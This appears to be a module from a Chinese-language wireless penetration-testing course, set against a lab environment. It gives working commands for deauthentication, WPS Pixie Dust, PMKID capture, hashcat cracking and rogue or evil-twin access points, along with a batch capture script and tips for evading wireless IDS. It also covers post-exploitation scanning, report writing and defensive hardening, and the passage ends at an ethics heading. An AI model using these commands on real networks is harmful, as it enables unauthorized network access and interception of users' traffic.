================================================================================
  模块07：无线安全综合实战
  学习目标：掌握完整无线渗透测试流程、多工具协同、报告编写
  所需工具：aircrack-ng全套, kismet, reaver, bully, wifite, hostapd-wpe
            airgeddon, hashcat, hcxdumptool, wifiphisher, nmap, etc
================================================================================

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
第一部分：完整无线渗透测试方法论
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

1.1 无线渗透测试标准流程

  ┌──────────────────────────────────────────────────────────────┐
  │ Phase 1 : 侦察 (Reconnaissance)           - 时间占比 40%     │
  │   1.1 环境扫描 (airodump-ng, kismet)                        │
  │   1.2 定向扫描 (airodump-ng定向, wash WPS)                  │
  │   1.3 客户端分析 (已连接设备识别)                            │
  │   1.4 信号覆盖分析                                           │
  │   1.5 信息整理归类                                           │
  ├──────────────────────────────────────────────────────────────┤
  │ Phase 2 : 漏洞识别 (Vulnerability Assessment) - 时间 15%    │
  │   2.1 加密方式判定 (WEP/WPA/WPA2/WPA3/OPN)                  │
  │   2.2 WPS状态检查 (是否启用、是否锁定、芯片类型)            │
  │   2.3 PMKID可用性 (AP是否在EAPOL中包含PMKID)                │
  │   2.4 管理帧保护检查 (是否有PMF/802.11w)                    │
  │   2.5 默认凭据评估 (路由器默认密码)                          │
  │   2.6 物理安全评估 (路由器位置、标签可见性)                  │
  ├──────────────────────────────────────────────────────────────┤
  │ Phase 3 : 漏洞利用 (Exploitation)         - 时间 25%        │
  │   3.1 选择最优攻击路径                                       │
  │   3.2 执行攻击                                               │
  │   3.3 获取网络访问凭据                                       │
  ├──────────────────────────────────────────────────────────────┤
  │ Phase 4 : 后渗透 (Post-Exploitation)     - 时间 15%         │
  │   4.1 连接目标网络                                           │
  │   4.2 内网扫描 (nmap)                                       │
  │   4.3 网络拓扑发现                                           │
  │   4.4 流量嗅探和分析                                         │
  ├──────────────────────────────────────────────────────────────┤
  │ Phase 5 : 报告 (Reporting)                - 时间 5%         │
  │   5.1 发现总结                                               │
  │   5.2 风险评估                                               │
  │   5.3 修复建议                                               │
  │   5.4 技术报告编写                                           │
  └──────────────────────────────────────────────────────────────┘

1.2 攻击路径决策树

  根据侦察结果选择最优攻击方式：

  ┌─────────────────────────────────────────────────────────────┐
  │ 侦察结果：加密方式是什么？                                  │
  ├─────────────────────────────────────────────────────────────┤
  │                                                             │
  │ ┌─ WEP ──────────────────────────────────────────────────┐  │
  │ │ → ARP重放 + aircrack-ng (最快速，5-15分钟)              │  │
  │ │ → 或 wifite --wep --all                                 │  │
  │ └─────────────────────────────────────────────────────────┘  │
  │                                                             │
  │ ┌─ WPA2-PSK ─────────────────────────────────────────────┐  │
  │ │ 是否支持WPS？                                           │  │
  │ │   ├─ 是 → Pixie Dust攻击 (reaver -K 1) 优先！          │  │
  │ │   │       失败则标准PIN暴力 (reaver标准模式)            │  │
  │ │   └─ 否 → 是否有活跃客户端？                           │  │
  │ │           ├─ 是 → Deauth获取握手 → hashcat破解         │  │
  │ │           └─ 否 → PMKID攻击 (hcxdumptool + hashcat)    │  │
  │ └─────────────────────────────────────────────────────────┘  │
  │                                                             │
  │ ┌─ WPA2-Enterprise ───────────────────────────────────────┤  │
  │ │ → hostapd-wpe Rogue AP + 凭证收割                      │  │
  │ │ → 或 Evil Twin + 钓鱼页面 (wifiphisher/airgeddon)      │  │
  │ └─────────────────────────────────────────────────────────┘  │
  │                                                             │
  │ ┌─ WPA3 ─────────────────────────────────────────────────┐  │
  │ │ → 降级攻击 (迫使回到WPA2)                              │  │
  │ │ → Dragonblood漏洞测试                                  │  │
  │ │ → 字典攻击效果极低 (SAE抗离线破解)                     │  │
  │ └─────────────────────────────────────────────────────────┘  │
  │                                                             │
  │ ┌─ 开放网络 (OPN) ───────────────────────────────────────┤  │
  │ │ → 直接连接后做内网渗透                                  │  │
  │ │ → 中间人攻击 (ARP欺骗、DNS劫持)                        │  │
  │ │ → Captive Portal绕过测试                               │  │
  │ └─────────────────────────────────────────────────────────┘  │
  └─────────────────────────────────────────────────────────────┘


━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
第二部分：多工具协同使用
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

2.1 双网卡并行操作(推荐配置)

  网卡1 (wlan0 -> wlan0mon): 监听/捕获
  网卡2 (wlan1 -> wlan1mon): 主动攻击(Deauth/注入)

  并行操作示例：
  ┌─────────────────────────────────────────────────────────────┐
  │ 终端1 (捕获):                                              │
  │ $ sudo airodump-ng -c 6 --bssid TARGET -w capture wlan0mon │
  │                                                             │
  │ 终端2 (Deauth):                                             │
  │ $ sudo aireplay-ng -0 0 -a TARGET -c CLIENT wlan1mon       │
  │                                                             │
  │ 终端3 (PMKID):                                              │
  │ $ sudo hcxdumptool -i wlan1mon -o pmkid.pcapng \           │
  │   --enable_status=1 --filtermode=2                          │
  │                                                             │
  │ 终端4 (破解):                                               │
  │ $ hashcat -m 22000 hash.hc22000 rockyou.txt                 │
  └─────────────────────────────────────────────────────────────┘

2.2 工具链数据流转

  数据捕获 → 格式转换 → 破解 → 结果分析

  完整流水线：
  ┌─────────────────────────────────────────────────────────────┐
  │ 1. 捕获                                                 │
  │    airodump-ng → .cap 文件                                 │
  │    hcxdumptool → .pcapng 文件                              │
  │                                                             │
  │ 2. 格式转换                                             │
  │    hcxpcapngtool → .hc22000 -> hashcat                     │
  │    aircrack-ng -J → .hccap -> hashcat (旧式)              │
  │                                                             │
  │ 3. 破解                                                 │
  │    hashcat -m 22000 → 密码明文                             │
  │    aircrack-ng -w → 密码明文                               │
  │                                                             │
  │ 4. 验证和解密                                           │
  │    airdecap-ng → 解密pcap                                 │
  │    Wireshark → 分析解密流量                                │
  └─────────────────────────────────────────────────────────────┘

2.3 批量目标处理脚本

  #!/bin/bash
  # 批量捕获WPA握手

  interface=wlan0mon
  dict=/usr/share/wordlists/rockyou.txt

  # 扫描并保存AP列表
  sudo airodump-ng $interface -w scan --output-format csv &
  sleep 60
  kill %1

  # 解析AP列表
  grep WPA scan-01.csv | while read line; do
    bssid=$(echo $line | cut -d, -f1)
    channel=$(echo $line | cut -d, -f4)
    essid=$(echo $line | cut -d, -f14)

    echo "Target: $essid ($bssid) Ch:$channel"

    # 定向捕获
    sudo timeout 120 airodump-ng -c $channel \
      --bssid $bssid -w "cap_$essid" $interface
  done


━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
第三部分：企业无线安全评估
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

3.1 企业无线安全评估清单

  01 物理安全
  [ ] AP是否在可物理接触范围？
  [ ] AP是否锁在机柜中？
  [ ] 是否有未授权AP插入网络端口？

  02 加密安全
  [ ] 是否使用WPA2-Enterprise？(禁止PSK用于企业)
  [ ] 是否强制使用CCMP(AES)？(禁用TKIP)
  [ ] 管理帧是否保护？(PMF/802.11w启用)
  [ ] 是否过渡到WPA3？

  03 认证安全
  [ ] 是否使用强EAP方法？(EAP-TLS, PEAP)
  [ ] EAP内部是否使用MSCHAPv2？
  [ ] 是否启用客户端证书验证？
  [ ] RADIUS服务器是否安全配置？

  04 WPS安全
  [ ] WPS是否已禁用？(企业环境必须禁用)
  [ ] 路由器WPS按钮是否物理可访问？

  05 Guest网络
  [ ] Guest网络是否与内网逻辑隔离？
  [ ] Client Isolation是否启用？
  [ ] Guest流量或带宽是否限制？

  06 监控和检测
  [ ] 是否部署WIDS/WIPS？
  [ ] Rogue AP检测是否启用？
  [ ] 是否有WiFi嗅探传感器？
  [ ] 日志是否集中收集和分析？

  07 客户端安全
  [ ] 是否禁止自动连接开放网络？
  [ ] 是否配置WiFi网络优先级？
  [ ] 历史网络列表是否定期清理？
  [ ] 是否配置802.1X supplicant安全？

  08 策略和流程
  [ ] 是否有无线安全策略文档？
  [ ] 是否定期进行无线安全评估？
  [ ] 是否有WiFi应急响应计划？

3.2 企业环境常见风险

  风险一: BYOD设备
  - 个人设备可能自动连接Rogue AP
  - 缺乏统一安全基线
  - 缓解: MDM管理，证书强制验证

  风险二: Rogue AP(内部威胁)
  - 员工私自接入非授权AP
  - 或攻击者物理放置Rogue设备
  - 缓解: WIDS，定期Walk-through扫描

  风险三: 证书不验证
  - 客户端不验证RADIUS服务器证书
  - 导致可被中间人攻击
  - 缓解: GPO/配置文件强制证书验证

  风险四: 弱密码策略
  - 部分用户使用弱域密码
  - MSCHAPv2可被离线破解
  - 缓解: 强密码策略，多因素认证


━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
第四部分：规避无线IDS/IPS
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

4.1 无线入侵检测系统(WIDS)

  WIDS可以检测的行为：
    - 异常Deauth/Disassoc帧(大量广播Deauth)
    - 具有相同BSSID的不同设备(Evil Twin)
    - 基于信号强度异常的AP
    - 异常Probe Request模式
    - 非法/伪造的管理帧
    - WPS暴力攻击(大量EAP失败)
    - 异常信道切换行为

4.2 规避检测的技巧

  ① 降低Deauth速率
    $ sudo aireplay-ng -0 1 -a TARGET -c CLIENT wlan0mon
    发送极少量Deauth(1次)，等待自然重连
    不要广播(指定客户端MAC)

  ② 被动等待替代主动攻击
    ✓ 等待合法客户端自然连接(虽然需要更长时间)
    ✓ PMKID攻击不需要Deauth
    ✓ 在客户端活跃时段捕获(早9点/下午2点)

  ③ 伪装MAC地址
    $ sudo macchanger -r wlan0
    每次操作使用随机MAC，避免被WIDS追踪

  ④ 限制攻击频率
    对WPS攻击使用间隔(-r参数)
    $ sudo reaver -r 3:30 ... (每30秒尝试一次，更难被检测)

  ⑤ 利用合法行为
    在某些环境中，模拟正常客户端行为
    关联请求、探测请求看起来像普通客户端

  ⑥ 时间选择
    - 在非安全人员工作时段攻击
    - 隐藏在正常WiFi流量高峰期

4.3 WIPS绕过研究

  注意: 实际绕过WIDS/WIPS需要深入研究和实践
  本教程提供基础概念，实际应用需要更多经验
  授权渗透测试中，通常不需要绕过检测(因为已知会)


━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
第五部分：后渗透 - 连接网络后的操作
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

5.1 连接目标WiFi

  $ sudo wpa_supplicant -B -i wlan0 -c <(wpa_passphrase SSID 'password')
  $ sudo dhclient wlan0
  $ ip addr show wlan0
  确认获得IP地址

5.2 内网扫描

  快速扫描：
  $ sudo nmap -sn 192.168.1.0/24
  (Ping扫描，发现活跃主机)

  详细扫描：
  $ sudo nmap -sV -O -p- 192.168.1.0/24
  (版本检测 + 操作系统检测 + 全端口扫描)

  常见端口扫描：
  $ sudo nmap -sS -sV --top-ports 1000 192.168.1.0/24

5.3 网络服务发现

  $ sudo nmap -sC -sV 192.168.1.0/24
  (详细的服务枚举)

  常见服务检查：
    - TCP 80/443 : Web管理界面
    - TCP 22     : SSH
    - TCP 23     : Telnet(旧设备)
    - TCP 21     : FTP
    - UDP 53     : DNS
    - TCP 445    : SMB

5.4 路由器漏洞检测

  连接后应检查：
    [ ] 路由器管理端口是否开放
    [ ] 默认凭据是否有效(admin/admin)
    [ ] Web管理界面是否有已知漏洞
    [ ] UPnP是否启用
    [ ] 端口转发/防火墙配置

  $ curl http://192.168.1.1
  $ enum4linux 192.168.1.1
  $ nikto -h http://192.168.1.1

5.5 流量嗅探

  $ sudo tcpdump -i wlan0 -w internal_traffic.pcap
  $ sudo bettercap -iface wlan0

  (注意：解密WiFi后看到的是IP层数据，如有SSL还需单独解密)


━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
第六部分：无线渗透报告模板
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

6.1 报告结构

  ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
  1. 执行摘要 (Executive Summary)
  ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

  简要描述：
    - 测试范围和日期
    - 关键发现(1-2句话总结最严重的问题)
    - 整体风险等级(严重/高/中/低)
    - 关键建议概述

  ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
  2. 测试方法 (Methodology)
  ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

    - 使用的工具列表和版本
    - 测试范围(AP数量、SSID列表、位置)
    - 测试时间窗口
    - 测试限制说明

  ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
  3. 发现详情 (Findings)
  ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

  每个发现包含：
    - 漏洞ID (编号)
    - 严重性评级
    - 受影响的AP/SSID
    - 发现描述
    - 复现步骤
    - 证据(截图、日志)
    - 影响分析
    - 修复建议

  示例发现：

  漏洞ID: WIFI-001
  严重性: 严重
  标题: WPS启用且可被Pixie Dust攻击
  描述: AP (BSSID: AA:BB:CC:DD:EE:FF, SSID: CorpWiFi) 启用了WPS功能。
        芯片为Ralink RT3070，存在Pixie Dust漏洞。
        攻击者在15秒内成功获取PIN码和WPA密码。
  复现步骤:
    1. sudo airmon-ng start wlan0
    2. sudo wash -i wlan0mon -a (发现WPS)
    3. sudo reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -c 6 -K 1 -vv
    4. 15秒后成功获得: PIN=12345670, PSK=corpsecret123
  影响: 任何在WiFi范围内的攻击者可在极短时间内破解并接入网络
  修复: 立即在路由器管理页面禁用WPS功能

  ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
  4. 风险评估矩阵 (Risk Matrix)
  ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

  ┌──────────┬────────────┬──────────┬─────────────┐
  │ 漏洞ID   │ 可能性     │ 影响     │ 风险等级    │
  ├──────────┼────────────┼──────────┼─────────────┤
  │ WIFI-001 │ 高         │ 严重     │ Critical    │
  │ WIFI-002 │ 中         │ 高       │ High        │
  │ WIFI-003 │ 低         │ 中       │ Medium      │
  │ WIFI-004 │ 低         │ 低       │ Low         │
  └──────────┴────────────┴──────────┴─────────────┘

  ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
  5. 修复建议 (Remediation)
  ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

  按优先级排列：
    P0 (立即): 禁用WPS, 更换被破解的WiFi密码
    P1 (一周): 部署WPA2-Enterprise替代PSK, 启用PMF
    P2 (一月): 部署WIDS, 制定无线安全策略
    P3 (计划): 研究WPA3过渡方案

  ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
  6. 附录 (Appendix)
  ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

  - 工具完整列表
  - 扫描结果完整数据
  - 截图的完整尺寸版本
  - 术语表


━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
第七部分：综合实战演练
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

实战目标：对一个实验无线环境完成完整的五阶段无线渗透测试

实验环境准备：
  - 至少2个测试AP(不同加密方式)
  - WPA2-PSK (EasyWiFi, 密码: password)
  - WPA2-PSK + WPS (WPS_WiFi, 开启WPS)
  - WPA2-Enterprise (模拟)
  - 至少1个客户端连接
  - 可选：WEP AP(学习用)

══════════════════════════════════════════════════════════════════
  Phase 1: 侦察 — airodump-ng扫描 + kismet分析
══════════════════════════════════════════════════════════════════

Step 1.1: 启动监听模式
  终端$: sudo airmon-ng check kill
  终端$: sudo airmon-ng start wlan0

Step 1.2: 全信道扫描(5分钟)
  终端$: sudo airodump-ng wlan0mon

  记录表格：
  ┌────┬───────────────────┬───────────┬────┬──────┬────┬─────┐
  │ ID │ BSSID             │ ESSID     │ CH │ ENC  │PWR │ WPS │
  ├────┼───────────────────┼───────────┼────┼──────┼────┼─────┤
  │  1 │                   │           │    │      │    │     │
  │  2 │                   │           │    │      │    │     │
  │  3 │                   │           │    │      │    │     │
  └────┴───────────────────┴───────────┴────┴──────┴────┴─────┘

Step 1.3: WPS设备扫描
  终端$: sudo wash -i wlan0mon -a

  记录哪些AP支持WPS，芯片类型是什么

Step 1.4: Kismet深度分析(并行)
  新终端$: sudo kismet -c wlan0
  访问 http://localhost:2501
  - 查看每个AP的详细信息
  - 查看客户端关联关系
  - 导出pcap数据

Step 1.5: 客户端分析
  针对每个目标AP(定向扫描):
  终端$: sudo airodump-ng -c <CH> --bssid <BSSID> -w recon_<ID> wlan0mon
  运行10分钟，记录：
  - 关联客户端的MAC和数量
  - 客户端活跃时间段
  - 客户端制造厂商(OUI查询)

Step 1.6: 侦察数据整理
  创建侦察报告表格，标注攻击优先级

══════════════════════════════════════════════════════════════════
  Phase 2: 漏洞识别 — 分析加密方式和WPS状态
══════════════════════════════════════════════════════════════════

Step 2.1: 加密分析

  ┌────────────────┬───────────────┬─────────────────────┐
  │ 目标           │ 加密方式      │ 可选攻击路径        │
  ├────────────────┼───────────────┼─────────────────────┤
  │ EasyWiFi       │ WPA2-PSK      │ Deauth获取握手      │
  │                │               │ PMKID攻击(无客户端) │
  ├────────────────┼───────────────┼─────────────────────┤
  │ WPS_WiFi       │ WPA2-PSK+WPS  │ Pixie Dust 优先！   │
  │                │               │ 标准PIN暴力(备选)  │
  ├────────────────┼───────────────┼─────────────────────┤
  │ Enterprise     │ WPA2-Ent PEAP │ Rogue AP + 凭证收割 │
  └────────────────┴───────────────┴─────────────────────┘

Step 2.2: 攻击优先级排序

  优先级1: WPS_WiFi (有WPS，Pixie Dust最快)
  优先级2: EasyWiFi (WPA2-PSK，有客户端)
  优先级3: Enterprise (需要更多设备和设置)

Step 2.3: 漏洞文档记录
  对每个目标记录：
  - 漏洞类型
  - 攻击可行性
  - 预估破解时间
  - 所需工具

══════════════════════════════════════════════════════════════════
  Phase 3: 攻击 — 根据漏洞选择最优攻击方式
══════════════════════════════════════════════════════════════════

Step 3.1: 攻击 WPS_WiFi (Pixie Dust首选)

  终端$: sudo reaver -i wlan0mon -b <WPS_BSSID> -c <CH> -K 1 -vv

  预期结果：
  - 如果Pixie Dust成功: 15秒获取PIN和密码
  - 如果失败: 自动回退标准PIN暴力

  结果记录：
  PIN: __________________
  WPA PSK: __________________

Step 3.2: 攻击 EasyWiFi (PMKID或Deauth+握手)

  方法A: PMKID攻击(如果无客户端)
  终端1$: sudo hcxdumptool -i wlan0mon -o easywifi.pcapng \
           --enable_status=1 --bssid=<BSSID> --filtermode=2
  等待 [PMKID FOUND]
  Ctrl+C

  终端$: hcxpcapngtool easywifi.pcapng -o easywifi.hc22000
  终端$: hashcat -m 22000 easywifi.hc22000 /usr/share/wordlists/rockyou.txt

  方法B: Deauth获取握手(如果有客户端)
  终端1$: sudo airodump-ng -c <CH> --bssid <BSSID> \
           -w easywifi_cap wlan0mon
  终端2$: sudo aireplay-ng -0 3 -a <BSSID> -c <CLIENT_MAC> wlan0mon
  终端1出现 "WPA handshake" -> 成功！

  破解：
  终端$: hcxpcapngtool easywifi_cap-01.cap -o easywifi.hc22000
  终端$: hashcat -m 22000 easywifi.hc22000 rockyou.txt

Step 3.3: 攻击 Enterprise (Rogue AP)
  (如条件允许)

  终端$: sudo hostapd-wpe /tmp/hostapd-wpe.conf
  (Rogue AP搭建)
  终端$: sudo aireplay-ng -0 3 -a <BSSID> -c <CLIENT> wlan0mon
  (迫使客户端连接到Rogue AP)

Step 3.4: 攻击结果汇总

  ┌────┬─────────┬──────────────┬────────────┬───────────┐
  │ ID │ Target  │ Method       │ Result     │ Time      │
  ├────┼─────────┼──────────────┼────────────┼───────────┤
  │  1 │WPS_WiFi│ Pixie Dust   │ SUCCESS    │ 15 sec    │
  │  2 │EasyWiFi │ PMKID+hashcat│ SUCCESS    │ 5 min     │
  │  3 │EntWiFi  │ Rogue AP     │ PARTIAL    │ -         │
  └────┴─────────┴──────────────┴────────────┴───────────┘

══════════════════════════════════════════════════════════════════
  Phase 4: 后渗透 — 连接网络后做内网扫描
══════════════════════════════════════════════════════════════════

Step 4.1: 恢复网卡并连接
  终端$: sudo airmon-ng stop wlan0mon
  终端$: sudo systemctl restart NetworkManager

Step 4.2: 连接破解的WiFi
  GUI: 选择WiFi网络 → 输入密码
  或CLI:
  $ nmcli dev wifi connect EasyWiFi password password

Step 4.3: 确认连接
  $ ip addr show wlan0
  $ ip route
  记录获得的IP: __________________
  记录网关IP: __________________
  记录DNS服务器: __________________

Step 4.4: 内网主机发现
  $ sudo nmap -sn 192.168.1.0/24
  记录发现的活跃主机数量和IP

Step 4.5: 内网服务扫描
  $ sudo nmap -sV -sC -O 192.168.1.0/24

  记录关键服务：
  - 网关管理界面: http://192.168.1.1
  - 共享文件服务
  - 打印机
  - 其他IoT设备

Step 4.6: 路由器安全评估
  $ curl -s http://192.168.1.1 | head -20
  $ nmap -p 22,23,80,443,8080 192.168.1.1

  尝试默认凭据(admin/admin, admin/password等):

Step 4.7: 流量分析
  $ sudo tcpdump -i wlan0 -w internal.pcap -c 1000
  $ wireshark internal.pcap

Step 4.8: 后渗透发现文档

  ┌─────────────────────┬───────────────────────────────────────┐
  │ 项目                │ 内容                                  │
  ├─────────────────────┼───────────────────────────────────────┤
  │ 子网                │ 192.168.1.0/24                        │
  │ 活跃主机            │ 15                                    │
  │ 网关                │ 192.168.1.1 (TP-Link Archer C7)       │
  │ 关键服务器          │ 192.168.1.10 (NAS), 192.168.1.20 (打印机)│
  │ 开放端口(网关)      │ 80(HTTP), 443(HTTPS), 22(SSH)         │
  │ 默认凭据有效        │ 否 (已修改)                            │
  │ 其他发现            │ UPnP启用，可发现内网设备和服务          │
  └─────────────────────┴───────────────────────────────────────┘

══════════════════════════════════════════════════════════════════
  Phase 5: 报告 — 编写无线安全评估报告
══════════════════════════════════════════════════════════════════

Step 5.1: 整理所有发现
  汇总Phases 1-4的所有数据

Step 5.2: 编写执行摘要
  用1-2段文字概括：
  - 测试范围(3个AP，2.4GHz+5GHz)
  - 发现的关键漏洞(1个严重+1个高危)
  - 总体风险等级
  - 核心建议

Step 5.3: 编写每个发现的详情

  发现1: WPS Pixie Dust漏洞(严重)
  - AP: WPS_WiFi, BSSID: XX:XX:XX:XX:XX:XX
  - 攻击方式: reaver -K 1 (Pixie Dust)
  - 时间: 15秒
  - 影响: 即时获取WiFi密码
  - 修复: 禁用WPS

  发现2: 弱WiFi密码(高危)
  - AP: EasyWiFi, BSSID: YY:YY:YY:YY:YY:YY
  - 攻击方式: PMKID捕获 + hashcat字典攻击
  - 时间: 5分钟
  - 影响: 字典攻击轻易破解(密码在rockyou中出现)
  - 修复: 更换为16位以上复杂随机密码

Step 5.4: 风险评估矩阵
  ===> 填入上方的矩阵表格

Step 5.5: 编写修复建议(按优先级)

  P0 (立即):
    - 禁用WPS_WiFi的WPS功能
    - 更换EasyWiFi的WiFi密码

  P1 (本月):
    - 对所有AP禁用WPS
    - 实施强密码策略(16位+)
    - 启用管理帧保护(PMF)

  P2 (本季度):
    - 部署WIDS/WIPS
    - 考虑迁移到WPA3

Step 5.6: 附录和证据整理
  将所有截图、日志、pcap文件作为附件


━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
第八部分：无线安全加固建议(防守方视角)
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

8.1 家庭用户无线安全建议

  L1 基础(必须做)
    [✓] 修改路由器默认管理员密码
    [✓] 使用WPA2-PSK(AES)或WPA3
    [✓] 设置强WiFi密码(16位+混合字符)
    [✓] 禁用WPS
    [✓] 更新路由器固件

  L2 进阶(建议做)
    [ ] 隐藏SSID(仅限安全/隐私目的)
    [ ] 启用MAC地址过滤(基础但可绕过)
    [ ] 降低AP发射功率(减少覆盖范围外泄)
    [ ] 启用路由器管理界面的HTTPS
    [ ] 禁用远程管理

  L3 高级(安全意识)
    [ ] 定期检查已连接设备列表
    [ ] 使用访客网络隔离IoT设备
    [ ] 定期更换WiFi密码
    [ ] 考虑使用独立防火墙设备

8.2 企业无线安全建议

  ① 加密和认证
    - 使用WPA2-Enterprise(EAP-TLS)，避免PSK
    - 启用PMF(管理帧保护)
    - 逐步迁移到WPA3
    - 证书强制验证(客户端必须验证RADIUS证书)

  ② 网络架构
    - 内部网络和访客网络完全隔离
    - 实施Client Isolation
    - 使用VLAN对不同无线流量分段
    - 无线流量必须通过防火墙后才能访问核心网络

  ③ 监控和检测
    - 部署WIDS/WIPS系统
    - 定期进行无线安全评估
    - 检测Rogue AP(有线侧和无线侧)
    - 设置异常活动告警
    - 集中日志管理(SIEM)

  ④ 客户端安全
    - 使用MDM管理所有移动设备
    - 禁用自动连接开放网络(组策略)
    - 配置802.1X supplicant安全设置
    - 定期审计WiFi配置文件

  ⑤ 运维安全
    - 定期固件更新计划
    - 变更管理流程
    - 无线网络应急预案
    - 员工无线安全意识培训

8.3 检测无线攻击的日志特征

  异常信号：
    [WARNING] 短时间内大量Deauth帧
    [WARNING] 同一BSSID在不同信道出现
    [WARNING] 大量WPS认证失败
    [WARNING] 异常的Probe Request群
    [WARNING] Beacon帧间隔异常

  监控工具：
    - Kismet(被动检测)
    - Aircrack-ng(airdecap-ng分析流量)
    - Wazuh/Snort/Suricata(网络IDS规则)
    - 商业WIPS控制器


━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
第九部分：新兴无线技术安全
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

9.1 WiFi 6 (802.11ax) 安全特性

  新特性对安全的影响：
    - OFDMA：更高效的数据调度，但也意味着更复杂的帧结构
    - 目标唤醒时间(TWT)：设备可休眠，减少被被动嗅探的机会
    - WPA3强制支持：WiFi认证必须在WPA3下运行
    - 6GHz频段(6E)：新频段，新干扰模式，但也需新的安全评估

  安全挑战：
    - 旧网卡可能不支持6GHz监听模式(需新硬件)
    - 更高数据速率和更复杂的MIMO模式
    - 更难被动捕获所有数据

9.2 WPA3安全深度分析

  WPA3的改进：
    ① SAE (Simultaneous Authentication of Equals)
       - 替代4次握手，使用Dragonfly密钥交换
       - 前向保密：密码泄露不影响历史流量
       - 抗离线字典攻击
       - 每次认证携带随机MAC(身份保护)

    ② 已知攻击：
       - Dragonblood(2019)：降级攻击 → WPA2
       - 过渡模式(Transition Mode)：WPA2兼容模式可被利用
       - 时间侧信道攻击(Time-based side-channel)

    ③ WPA3的安全性评估：
       + 显著优于WPA2
       + 即使密码泄露也无法解密历史流量
       + 在线暴力攻击是唯一可行的密码攻击
       - 过渡模式可能被降级攻击利用
       - 驱动/固件实现可能存在漏洞

  目前攻击WPA3的有限途径：
    → 降级到WPA2然后使用WPA2攻击方法
    → 利用过渡模式漏洞
    → 针对特定实现的侧信道攻击(较罕见)

9.3 WiFi 7 (802.11be) 展望

  预计特性：
    - 320 MHz 信道带宽
    - 4096-QAM
    - 多链路操作(MLO)
    - 增强的QoS和安全

  安全考量：
    - 更宽的频段意味着更大的攻击面
    - 新协议需要新的解析工具
    - 多链路操作带来新的信道管理挑战


━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
第十部分：注意事项
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

WARNING 法律警告
  - 无线渗透测试必须在书面授权范围内进行
  - 未经授权的无线攻击在绝大多数国家和地区都是违法的
  - 在中国，《网络安全法》第27条明确禁止危害网络安全的活动
  - 《刑法》第285条、第286条涉及非法获取计算机信息系统数据
  - 企业安全测试需要合法签署的授权书
  - 本文所有内容仅供教育目的

WARNING 伦理准则
